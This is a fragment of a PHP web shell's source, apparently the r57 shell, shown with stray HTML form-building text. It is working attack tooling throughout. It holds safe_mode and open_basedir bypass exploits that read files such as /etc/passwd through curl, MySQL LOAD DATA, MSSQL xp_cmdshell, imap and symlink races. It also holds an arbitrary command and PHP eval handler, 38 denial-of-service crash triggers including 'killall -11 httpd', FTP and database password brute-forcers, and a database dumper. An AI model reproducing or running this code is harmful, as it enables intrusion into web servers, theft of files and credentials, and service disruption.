Not Found

";
if($safe_mode || $open_basedir)
{
 switch($_POST['cmd'])
 {
 case 'safe_dir':
 
  if (@function_exists('scandir') && ($d=@scandir($dir)) && !isset($_POST['glob']) && !isset($_POST['realpath']))
   {
   foreach ($d as $file)
    {
     if ($file=="." || $file=="..") continue;
     @clearstatcache();
     @list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
     if(!$unix){ 
     echo date("d.m.Y H:i",$mtime);
     if(@is_dir($file)) echo "  <DIR> "; else printf("% 7s ",$size);
     }
     else{ 
     if(@function_exists('posix_getpwuid') && @function_exists('posix_getgrgid')){
      $owner = @posix_getpwuid($uid);
      $grgid = @posix_getgrgid($gid);
     }else{$owner['name']=$grgid['name']='';}
     echo $inode." ";
     echo perms(@fileperms($file));
     @printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
     echo @date("d.m.Y H:i ",$mtime);
     }
     echo "$file\n";
    }
   }

elseif (@function_exists('dir') && ($d=@dir($dir)) && !isset($_POST['glob']) && !isset($_POST['realpath']))
   {
   while (false!==($file=$d->read()))
    {
     if ($file=="." || $file=="..") continue;
     @clearstatcache();
     @list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
     if(!$unix){ 
     echo date("d.m.Y H:i",$mtime);
     if(@is_dir($file)) echo "  <DIR> "; else printf("% 7s ",$size);
     }
     else{ 
     if(@function_exists('posix_getpwuid') && @function_exists('posix_getgrgid')){
      $owner = @posix_getpwuid($uid);
      $grgid = @posix_getgrgid($gid);
     }else{$owner['name']=$grgid['name']='';}
     echo $inode." ";
     echo perms(@fileperms($file));
     @printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
     echo @date("d.m.Y H:i ",$mtime);
     }
     echo "$file\n";
    }
   $d->close();
   }
   
  elseif (@function_exists('opendir') && @function_exists('readdir') && ($d=@opendir($dir)) && !isset($_POST['glob']) && !isset($_POST['realpath']))
   {
   while (false!==($file=@readdir($d)))
    {
     if ($file=="." || $file=="..") continue;
     @clearstatcache();
     @list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
     if(!$unix){ 
     echo date("d.m.Y H:i",$mtime);
     if(@is_dir($file)) echo "  <DIR> "; else printf("% 7s ",$size);
     }
     else{ 
     if(@function_exists('posix_getpwuid') && @function_exists('posix_getgrgid')){
      $owner = @posix_getpwuid($uid);
      $grgid = @posix_getgrgid($gid);
     }else{$owner['name']=$grgid['name']='';}
     echo $inode." ";
     echo perms(@fileperms($file));
     @printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
     echo @date("d.m.Y H:i ",$mtime);
     }
     echo "$file\n";
    }
   @closedir($d);
   }

elseif(@function_exists('glob') && (isset($_POST['glob']) || !isset($_POST['realpath'])))
    {
       echo "PHP glob() listing directory Safe_mode bypass Exploit\r\n\r\n";
       function eh($errno, $errstr, $errfile, $errline)
        {
          global $D, $c, $i; 
          preg_match("/SAFE\ MODE\ Restriction\ in\ effect\..*whose\ uid\ is(.*)is\ not\ allowed\ to\ access(.*)owned by uid(.*)/", $errstr, $o); 
          if($o){ $D[$c] = $o[2]; $c++;} 
        }
       $error_reporting = @ini_get('error_reporting');
       error_reporting(E_WARNING); 
       @ini_set("display_errors", 1); 
       @ini_alter("display_errors", 1); 
       $root = "/"; 
       if($dir) $root = $dir; 
       $c = 0; $D = array(); 
       @set_error_handler("eh"); 
       $chars = "_-.0123456789abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"; 
       for($i=0; $i < strlen($chars); $i++)
       {
        $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}"; 
        $prevD = $D[count($D)-1]; 
        @glob($path."*"); 
        if($D[count($D)-1] != $prevD)
         {
           for($j=0; $j < strlen($chars); $j++)
           {
            $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}"; 
            $prevD2 = $D[count($D)-1]; 
            @glob($path."*"); 
            if($D[count($D)-1] != $prevD2)
             {
              for($p=0; $p < strlen($chars); $p++)
               {
                $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}"; 
                $prevD3 = $D[count($D)-1]; 
                @glob($path."*"); 
                if($D[count($D)-1] != $prevD3)
                 {
                  for($r=0; $r < strlen($chars); $r++)
                   {
                    $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}{$chars[$r]}"; 
                    @glob($path."*"); 
                   } 
                 }        
               } 
             }        
           }    
         } 
       } 
       $D = array_unique($D); 
       foreach($D as $item) echo "{$item}\r\n"; 
       echo "\r\n Generation time: ".round(@getmicrotime()-starttime,4)." sec\r\n";
       error_reporting($error_reporting);
    }
    elseif(@function_exists('realpath') && (!isset($_POST['glob']) || isset($_POST['realpath'])))
    {
       echo "PHP realpath() listing directory Safe_mode bypass Exploit\r\n\r\n";
       if(!$dir){$dir='/etc/';}; 
       if(!empty($_POST['end_rlph'])){$end_rlph=$_POST['end_rlph'];}else{$end_rlph='';}
       if(!empty($_POST['n_rlph'])){$n_rlph=$_POST['n_rlph'];}else{$n_rlph='3';}

if($realpath=realpath($dir.'/')){echo $realpath."\r\n";}
       if($end_rlph!='' && $realpath=realpath($dir.'/'.$end_rlph)){echo $realpath."\r\n";}
       foreach($presets_rlph as $preset_rlph){
           if($realpath=realpath($dir.'/'.$preset_rlph.$end_rlph)){echo $realpath."\r\n";}
       }
       for($i=0; $i < strlen($chars_rlph); $i++){
          if($realpath=realpath($dir."/{$chars_rlph[$i]}".$end_rlph)){echo $realpath."\r\n";}
          if($n_rlph<=1){continue;};
          for($j=0; $j < strlen($chars_rlph); $j++){
             if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}".$end_rlph)){echo $realpath."\r\n";}
             if($n_rlph<=2){continue;};
      	     for($x=0; $x < strlen($chars_rlph); $x++){
                if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}{$chars_rlph[$x]}".$end_rlph)){echo $realpath."\r\n";}
                if($n_rlph<=3){continue;};
                for($y=0; $y < strlen($chars_rlph); $y++){
      	           if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}{$chars_rlph[$x]}{$chars_rlph[$y]}".$end_rlph)){echo $realpath."\r\n";}
      	           if($n_rlph<=4){continue;};
      	           for($z=0; $z < strlen($chars_rlph); $z++){
      	              if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}{$chars_rlph[$x]}{$chars_rlph[$y]}{$chars_rlph[$z]}".$end_rlph)){echo $realpath."\r\n";}
      	              if($n_rlph<=5){continue;};
      	              for($w=0; $w < strlen($chars_rlph); $w++){
      	                 if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}{$chars_rlph[$x]}{$chars_rlph[$y]}{$chars_rlph[$z]}{$chars_rlph[$w]}".$end_rlph)){echo $realpath."\r\n";}
      		      }
      		   }
      	         }
              }
          }
       }
       echo "\r\n Generation time: ".round(@getmicrotime()-starttime,4)." sec\r\n";
    }
    else echo $lang[$language.'_text29'];
 break;
  case 'test1':
  $ci = @curl_init("file://".$_POST['test1_file']);
  $cf = @curl_exec($ci);
  echo htmlspecialchars($cf);
  break;
  case 'test2':
  @include($_POST['test2_file']);
  break;
  case 'test3':
  if(empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; }
  $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']);
  if($db)
   {
   if(@mysql_select_db($_POST['test3_md'],$db))
    {
     @mysql_query("DROP TABLE IF EXISTS temp_r57_table");
     @mysql_query("CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL )");
/*     @mysql_query("LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table");*/
     @mysql_query("LOAD DATA LOCAL INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table");
     $r = @mysql_query("SELECT * FROM temp_r57_table");
     while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0])."\r\n"; }
     @mysql_query("DROP TABLE IF EXISTS temp_r57_table");
    }
    else echo "[-] ERROR! Can't select database";
   @mysql_close($db);
   }
  else echo "[-] ERROR! Can't connect to mysql server";
  break;
  case 'test4':
  if(empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; }
  $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);
  if($db)
   {
   if(@mssql_select_db($_POST['test4_md'],$db))
    {
     @mssql_query("drop table r57_temp_table",$db);
     @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db);
     @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);
     $res = mssql_query("select * from r57_temp_table",$db);
     while(($row=@mssql_fetch_row($res)))
      {
      echo htmlspecialchars($row[0])."\r\n";
      }
    @mssql_query("drop table r57_temp_table",$db);
    }
    else echo "[-] ERROR! Can't select database";
   @mssql_close($db);
   }
  else echo "[-] ERROR! Can't connect to MSSQL server";
  break;
  case 'test5':
  $temp=tempnam($dir, "fname");
  if (@file_exists($temp)) @unlink($temp);
  $extra = "-C ".$_POST['test5_file']." -X $temp";
  @mb_send_mail(NULL, NULL, NULL, NULL, $extra);
  $str = moreread($temp);
  echo htmlspecialchars($str);
  @unlink($temp);
  break;
  case 'test6':
  $stream = @imap_open('/etc/passwd', "", "");
  $dir_list = @imap_list($stream, trim($_POST['test6_file']), "*");
  for ($i = 0; $i < count($dir_list); $i++) echo htmlspecialchars($dir_list[$i])."\r\n";
  @imap_close($stream);
  break;
  case 'test7':
  $stream = @imap_open($_POST['test7_file'], "", "");
  $str = @imap_body($stream, 1);
  echo htmlspecialchars($str);
  @imap_close($stream);
  break;
  case 'test8':
  $temp=@tempnam($_POST['test8_file2'], "copytemp");
  $str = readzlib($_POST['test8_file1'],$temp);
  echo htmlspecialchars($str);
  @unlink($temp);
  break;
  case 'test9':
  @ini_restore("safe_mode");
  @ini_restore("open_basedir");
  $str = moreread($_POST['test9_file']);
  echo htmlspecialchars($str);
  break;
  case 'test10':
  @ob_clean();
  $error_reporting = @ini_get('error_reporting');
  error_reporting(E_ALL ^ E_NOTICE);
  @ini_set("display_errors", 1); 
  @ini_alter("display_errors", 1); 
  $str=@fopen($_POST['test10_file'],"r");
  while(!feof($str)){print htmlspecialchars(fgets($str));}
  fclose($str);
  error_reporting($error_reporting);
  break;
  case 'test11':
  @ob_clean();
  $temp = 'zip://'.$_POST['test11_file'];
  $str = moreread($temp);
  echo htmlspecialchars($str);
  break;
  case 'test12':
  @ob_clean();
  $temp = 'compress.bzip2://'.$_POST['test12_file'];
  $str = moreread($temp);
  echo htmlspecialchars($str);
  break;
  case 'test13':
  @error_log($_POST['test13_file1'], 3, "php://../../../../../../../../../../../".$_POST['test13_file2']);
  echo $lang[$language.'_text61'];
  break;
  case 'test14':
  @session_save_path($_POST['test14_file2']."\0;$tempdir");
  @session_start();
  @$_SESSION[php]=$_POST['test14_file1'];
  echo $lang[$language.'_text61'];
  break;
  case 'test15':
  @readfile($_POST['test15_file1'], 3, "php://../../../../../../../../../../../".$_POST['test15_file2']);
  echo $lang[$language.'_text61'];
  break;
  case 'test16':
  if (@fopen('srpath://../../../../../../../../../../../'.$_POST['test16_file'],"a")) echo $lang[$language.'_text61'];
  break;
  case 'test17_1':
  @unlink('symlinkread');
  @symlink('a/a/a/a/a/a/', 'dummy');
  @symlink('dummy/../../../../../../../../../../../'.$_POST['test17_file'], 'symlinkread');
  @unlink('dummy');
  while (1) 
   {
    @symlink('.', 'dummy');
    @unlink('dummy');
   }
  break;
  case 'test17_2':
  $str='';
  while (strlen($str) < 3) {   
/*   $str = moreread('symlinkread');*/
   $str = @file_get_contents('symlinkread');
   if($str){ @ob_clean(); echo htmlspecialchars($str);}
  }
  break;
  case 'test17_3':
  $dir = $files = array();
  if(@version_compare(@phpversion(),"5.0.0")>=0){
   while (@count($dir) < 3) {
    $dir=@scandir('symlinkread');
    if (@count($dir) > 2) {@ob_clean(); @print_r($dir); }
   }
  }
  else {
   while (@count($files) < 3) {
    $dh  = @opendir('symlinkread');
    while (false !== ($filename = @readdir($dh))) {
     $files[] = $filename;
    }
    if(@count($files) > 2){@ob_clean(); @print_r($files); }
   }
  }
  break;
  case 'test18':
  @putenv("TMPDIR=".$_POST['test18_file2']); 
  @ini_set("session.save_path", ""); 
  @ini_alter("session.save_path", ""); 
  @session_start();
  @$_SESSION[php]=$_POST['test18_file1'];
  echo $lang[$language.'_text61'];
  break;
  case 'test19':
  if(empty($_POST['test19_port'])) { $_POST['test19_port'] = "3306"; }
  $m = new mysqli('localhost',$_POST['test19_ml'],$_POST['test19_mp'],$_POST['test19_md'],$_POST['test19_port']);
  if(@mysqli_connect_errno()){ echo "[-] ERROR! Can't connect to mysqli server: ".mysqli_connect_error() ;};
  $m->options(MYSQLI_OPT_LOCAL_INFILE, 1);
  $m->set_local_infile_handler("r");
  $m->query("DROP TABLE IF EXISTS temp_r57_table");
  $m->query("CREATE TABLE temp_r57_table ( 'file' LONGBLOB NOT NULL )");
  $m->query("LOAD DATA LOCAL INFILE \"".$_POST['test19_file']."\" INTO TABLE temp_r57_table");
  $r = $m->query("SELECT * FROM temp_r57_table");
  while(($r_sql = @mysqli_fetch_array($r))) { echo @htmlspecialchars($r_sql[0])."\r\n"; }
  $m->query("DROP TABLE IF EXISTS temp_r57_table");
  $m->close();
  break;
 }
}

if((!$safe_mode) && ($_POST['cmd']!="php_eval") && ($_POST['cmd']!="mysql_dump") && ($_POST['cmd']!="db_query") && ($_POST['cmd']!="ftp_brute") && ($_POST['cmd']!="db_brute")){
 $cmd_rep = ex($_POST['cmd']);
 if(!$unix) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
 else { echo @htmlspecialchars($cmd_rep)."\n"; }
}/*elseif($safe_mode){
 $cmd_rep = safe_ex($_POST['cmd']);
 if(!$unix) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
 else { echo @htmlspecialchars($cmd_rep)."\n"; }
}
*/
switch($_POST['cmd'])
{
 case 'dos1':
 function a() { a(); } a();
 break;
 case 'dos2':
 @pack("d4294967297", 2);
 break;
 case 'dos3':
 $a = "a";@unserialize(@str_replace('1', 2147483647, @serialize($a)));
 break;
 case 'dos4':
 $t = array(1);while (1) {$a[] = &$t;};
 break;
 case 'dos5':
 @dl("sqlite.so");$db = new SqliteDatabase("foo");
 break;
 case 'dos6':
 preg_match('/(.(?!b))*/', @str_repeat("a", 10000));
 break;
 case 'dos7':
 @str_replace("A", str_repeat("B", 65535), str_repeat("A", 65538));
 break;
 case 'dos8':
 @shell_exec("killall -11 httpd");
 break;
 case 'dos9':
 function cx(){ @tempnam("/www/", '../../../../../..'.$tempdir.'cx'); cx(); } cx();
 break;
 case 'dos10':
 $a = @str_repeat ("A",438013);$b = @str_repeat ("B",951140);@wordwrap ($a,0,$b,0);
 break;
 case 'dos11':
 @array_fill(1,123456789,"Infigo-IS");
 break;
 case 'dos12':
 @substr_compare("A","A",12345678);
 break;
 case 'dos13':
 @unserialize("a:2147483649:{");
 break;
 case 'dos14':
 $Data = @str_ireplace("\n", "<br>", $Data);
 break;
 case 'dos15':
 function toUTF($x) {return chr(($x >> 6) + 192) . chr(($x & 63) + 128);}
 $str1 = "";for($i=0; $i < 64; $i++){ $str1 .= toUTF(977);}
 @htmlentities($str1, ENT_NOQUOTES, "UTF-8");
 break;
 case 'dos16':
 $r = @zip_open("x.zip");$e = @zip_read($r);$x = @zip_entry_open($r, $e);
 for ($i=0; $i<1000; $i++) $arr[$i]=array(array(""));
 unset($arr[600]);@zip_entry_read($e, -1);unset($arr[601]);
 break;
 case 'dos17':
 $z = "UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU"; 
 $y = "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD"; 
 $x = "AQ                                                                        "; 
 unset($z);unset($y);$x = base64_decode($x);$y = @sqlite_udf_decode_binary($x);unset($x);
 break;
 case 'dos18':
 $MSGKEY = 519052;$msg_id = @msg_get_queue ($MSGKEY, 0600); 
 if (!@msg_send ($msg_id, 1, 'AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHH', false, true, $msg_err)) 
 echo "Msg not sent because $msg_err\n"; 
 if (@msg_receive ($msg_id, 1, $msg_type, 0xffffffff, $_SESSION, false, 0, $msg_error)) { 
 echo "$msg\n"; 
 } else { echo "Received $msg_error fetching message\n"; break; } 
 @msg_remove_queue ($msg_id);
 break;
 case 'dos19':
 $url = "php://filter/read=OFF_BY_ONE./resource=/etc/passwd"; @fopen($url, "r");
 break;
 case 'dos20':
 $hashtable = str_repeat("A", 39);
 $hashtable[5*4+0]=chr(0x58);$hashtable[5*4+1]=chr(0x40);$hashtable[5*4+2]=chr(0x06);$hashtable[5*4+3]=chr(0x08);
 $hashtable[8*4+0]=chr(0x66);$hashtable[8*4+1]=chr(0x77);$hashtable[8*4+2]=chr(0x88);$hashtable[8*4+3]=chr(0x99);
 $str = 'a:100000:{s:8:"AAAABBBB";a:3:{s:12:"0123456789AA";a:1:{s:12:"AAAABBBBCCCC";i:0;}s:12:"012345678AAA";i:0;s:12:"012345678BAN";i:0;}';
 for ($i=0; $i<65535; $i++) { $str .= 'i:0;R:2;'; }
 $str .= 's:39:"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX";s:39:"'.$hashtable.'";i:0;R:3;';
 @unserialize($str);
 break;
 case 'dos21':
 imagecreatetruecolor(1234,1073741824);
 break;
 case 'dos22':
 imagecopyresized(imagecreatetruecolor(0x7fffffff, 120),imagecreatetruecolor(120, 120), 0, 0, 0, 0, 0x7fffffff, 120, 120, 120);
 break;
 case 'dos23':
 $a = str_repeat ("A",9989776); $b = str_repeat("/", 2798349); iconv_substr($a,0,1,$b);
 break;
 case 'dos24':
 setlocale(LC_COLLATE, str_repeat("A", 34438013));
 break;
 case 'dos25':
 glob(str_repeat("A", 9638013));
 break;
 case 'dos26':
 glob("a",-1);
 break;
 case 'dos27':
 fnmatch("*[1]e", str_repeat("A", 9638013));
 break;
 case 'dos28':
 if (extension_loaded("gd")){ $buff = str_repeat("A",9999); $res = imagepsloadfont($buff); echo "boom!!\n";}
 break;
 case 'dos29':
 if(function_exists('msql_connect')){ msql_pconnect(str_repeat('A',49424).'BBBB'); msql_connect(str_repeat('A',49424).'BBBB');}
 break;
 case 'dos30':
 $a=str_repeat("A", 65535);  $b=1;  $c=str_repeat("A", 65535);  chunk_split($a,$b,$c);
 break;
 case 'dos31':
 if (extension_loaded("win32std") ) { win_browse_file( 1, NULL, str_repeat( "\x90", 264 ), NULL, array( "*" => "*.*" ) );}
 break;
 case 'dos32':
 if (extension_loaded( "iisfunc" ) ){ $buf_unicode = str_repeat( "A", 256 ); $eip_unicode = "\x41\x41"; iis_getservicestate( $buf_unicode . $eip_unicode );}
 break;
 case 'dos33':
 $buff = str_repeat("\x41", 250);$get_EIP = "\x42\x42";$get_ESP = str_repeat("\x43", 100);$get_EBP = str_repeat("\x44", 100);ntuser_getuserlist($buff.$get_EIP.$get_ESP.$get_EBP);
 break;
 case 'dos34':
 if (extension_loaded("bz2")){ $buff = str_repeat("a",1000); com_print_typeinfo($buff);}
 break;
 case 'dos35':
 $a = str_repeat("/", 4199000); iconv(1, $a, 1);
 break;
 case 'dos36':
 $a = str_repeat("/", 2991370); iconv_mime_decode_headers(0, 1, $a);
 break;
 case 'dos37':
 $a = str_repeat("/", 3799000); iconv_mime_decode(1, 0, $a);
 break;
 case 'dos38':
 $a = str_repeat("/", 9791999); iconv_strlen(1, $a);
 break;
}

if ($_POST['cmd']=="php_eval"){
 $eval = @str_replace("<?","",$_POST['php_eval']);
 $eval = @str_replace("?>","",$eval);
 @eval($eval);}

if ($_POST['cmd']=="ftp_brute")
 {
 $suc = 0;
 if($_POST['brute_method']=='passwd'){
 foreach($users as $user)
  {
    $connection = @ftp_connect($ftp_server,$ftp_port,10);
    if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; }
    else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; } } 
    @ftp_close($connection);
  }
 }else if(($_POST['brute_method']=='dic') && isset($_POST['ftp_login'])){
  foreach($users as $user)
  {
    $connection = @ftp_connect($ftp_server,$ftp_port,10);
    if(@ftp_login($connection,$_POST['ftp_login'],$user)) { echo "[+] ".$_POST['ftp_login'].":$user - success\r\n"; $suc++; }
    @ftp_close($connection);
  }
 }
 echo "\r\n-------------------------------------\r\n";
 $count = count($users);
 if(isset($_POST['reverse']) && ($_POST['brute_method']=='passwd')) { $count *= 2; }
 echo $lang[$language.'_text97'].$count."\r\n";
 echo $lang[$language.'_text98'].$suc."\r\n";
 }

if ($_POST['cmd']=="db_brute")
 {
 $suc = 0;
 if($_POST['brute_method']=='passwd'){
 foreach($users as $user)
  {
   $sql = new my_sql();
   $sql->db   = $_POST['db'];
   $sql->host = $_POST['db_server'];
   $sql->port = $_POST['db_port'];
   $sql->user = $user;
   $sql->pass = $user;
   if($sql->connect()) { echo "[+] $user:$user - success\r\n"; $suc++; }
  }
 if(isset($_POST['reverse']))
  {
   foreach($users as $user)
    {
     $sql = new my_sql();
     $sql->db   = $_POST['db'];
     $sql->host = $_POST['db_server'];
     $sql->port = $_POST['db_port'];
     $sql->user = $user;
     $sql->pass = strrev($user);
     if($sql->connect()) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; }
    }
  }
 }else if(($_POST['brute_method']=='dic') && isset($_POST['mysql_l'])){
  foreach($users as $user)
  {
   $sql = new my_sql();
   $sql->db   = $_POST['db'];
   $sql->host = $_POST['db_server'];
   $sql->port = $_POST['db_port'];
   $sql->user = $_POST['mysql_l'];
   $sql->pass = $user;
   if($sql->connect()) { echo "[+] ".$_POST['mysql_l'].":$user - success\r\n"; $suc++; }
  }
 }
 echo "\r\n-------------------------------------\r\n";
 $count = count($users);
 if(isset($_POST['reverse']) && ($_POST['brute_method']=='passwd')) { $count *= 2; }
 echo $lang[$language.'_text97'].$count."\r\n";
 echo $lang[$language.'_text98'].$suc."\r\n";
 }

if ($_POST['cmd']=="mysql_dump")
 {
  if(isset($_POST['dif'])) { morewrite($_POST['dif_name'], "mysql_dump\r\n"); }
  $sql = new my_sql();
  $sql->db   = $_POST['db'];
  $sql->host = $_POST['db_server'];
  $sql->port = $_POST['db_port'];
  $sql->user = $_POST['mysql_l'];
  $sql->pass = $_POST['mysql_p'];
  $sql->base = $_POST['mysql_db'];
  if(!$sql->connect()) { echo "[-] ERROR! Can't connect to SQL server"; }
  else if(!$sql->select_db()) { echo "[-] ERROR! Can't select database"; }
  else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Can't create dump"; }
  else {
   if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."\r\n"; }
   else if(@is_writable($_POST['dif_name'])){ foreach($sql->dump as $v){ morewrite($_POST['dif_name'], $v."\r\n");} } 
   else { echo "[-] ERROR! Can't write in dump file"; }
   }
 }

echo "

Directive	Local Value	Master Value
'.ws(3).''.$key.'	'.U_value($value['local_value']).'	'.U_value($value['global_value']).'

".$ts; echo sr(20,"".$lang[$language.'_text30'].$arrow."",$fs.in('text','test17_file',60,(!empty($_POST['test17_file'])?($_POST['test17_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_1').in('submit','submit',0,$lang[$language.'_text136']).$fe); echo $te."	".$ts; echo sr(0,"",$fs.in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_2').in('submit','submit',0,$lang[$language.'_butt8']).$fe); echo $te."
".$ts; echo sr(20,"".$lang[$language.'_text4'].$arrow."",$fs.in('text','test17_file',60,(!empty($_POST['test17_file'])?($_POST['test17_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_1').in('submit','submit',0,$lang[$language.'_text136']).$fe); echo $te."	".$ts; echo sr(0,"",$fs.in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_3').in('submit','submit',0,$lang[$language.'_butt8']).$fe); echo $te."
".$ts; echo sr(15,"".$lang[$language.'_text6'].$arrow."",in('file','userfile1',35,'')); echo sr(15,"".$lang[$language.'_text6'].$arrow."",in('file','userfile2',35,'')); echo sr(15,"".$lang[$language.'_text6'].$arrow."",in('file','userfile3',35,'')); echo sr(15,"".$lang[$language.'_text6'].$arrow."",in('file','userfile4',35,'')); echo sr(15,"".$lang[$language.'_text6'].$arrow."",in('file','userfile5',35,'')); echo sr(15,"".$lang[$language.'_text6'].$arrow."",in('file','userfile6',35,'')); echo sr(15,"".$lang[$language.'_text6'].$arrow."",in('file','userfile7',35,'')); echo sr(15,"".$lang[$language.'_text6'].$arrow."",in('file','userfile8',35,'')); echo $te."	".$ts; echo sr(15,"".$lang[$language.'_text6'].$arrow."",in('file','userfile9',35,'')); echo sr(15,"".$lang[$language.'_text6'].$arrow."",in('file','userfile10',35,'')); echo sr(15,"".$lang[$language.'_text6'].$arrow."",in('file','userfile11',35,'')); echo sr(15,"".$lang[$language.'_text6'].$arrow."",in('file','userfile12',35,'')); echo sr(15,"".$lang[$language.'_text6'].$arrow."",in('file','userfile13',35,'')); echo sr(15,"".$lang[$language.'_text6'].$arrow."",in('file','userfile14',35,'')); echo sr(15,"".$lang[$language.'_text6'].$arrow."",in('file','userfile15',35,'')); echo sr(15,'',in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2'])); echo $te."
".$ts; echo "".$lang[$language.'_text94']." "; echo sr(25,"".$lang[$language.'_text88'].$arrow."",in('text','ftp_server_port',20,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').in('hidden','dir',0,$dir)); echo sr(25,"",in('radio','brute_method',0,'passwd',1)."".$lang[$language.'_text99']." ( ".$lang[$language.'_text95']." )"); echo sr(25,"",in('checkbox','reverse id=reverse',0,'1',1).$lang[$language.'_text101']); echo sr(25,"",in('radio','brute_method',0,'dic',0).$lang[$language.'_text135']); echo sr(25,"".$lang[$language.'_text37'].$arrow."",in('text','ftp_login',0,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("root")))); echo sr(25,"".$lang[$language.'_text135'].$arrow."",in('text','dictionary',0,(!empty($_POST['dictionary'])?($_POST['dictionary']):($dir.'passw.dic')))); echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt1'])); echo $te."	".$ts; echo "".$lang[$language.'_text87']." "; echo sr(25,"".$lang[$language.'_text88'].$arrow."",in('text','ftp_server_port',20,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21")))); echo sr(25,"".$lang[$language.'_text37'].$arrow."",in('text','ftp_login',20,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous")))); echo sr(25,"".$lang[$language.'_text38'].$arrow."",in('text','ftp_password',20,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com")))); echo sr(25,"".$lang[$language.'_text89'].$arrow."",in('text','ftp_file',20,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down')); echo sr(25,"".$lang[$language.'_text18'].$arrow."",in('text','loc_file',20,$dir)); echo sr(25,"".$lang[$language.'_text90'].$arrow."","".in('hidden','dir',0,$dir)); echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14'])); echo $te."	".$ts; echo "".$lang[$language.'_text100']." "; echo sr(25,"".$lang[$language.'_text88'].$arrow."",in('text','ftp_server_port',20,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21")))); echo sr(25,"".$lang[$language.'_text37'].$arrow."",in('text','ftp_login',20,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous")))); echo sr(25,"".$lang[$language.'_text38'].$arrow."",in('text','ftp_password',20,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com")))); echo sr(25,"".$lang[$language.'_text18'].$arrow."",in('text','loc_file',20,$dir)); echo sr(25,"".$lang[$language.'_text89'].$arrow."",in('text','ftp_file',20,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up')); echo sr(25,"".$lang[$language.'_text90'].$arrow."","".in('hidden','dir',0,$dir)); echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2'])); echo $te."

'.ws(3).''.trim($info[0]).'	'.trim($info[1]).'
'.ws(3).' ---

".ws(3); $r .= (!$unix)? str_replace("/","\\",$file) : $file; $r .= ""; $r .= "
".$a."	".ws(2).$b."

Access Denied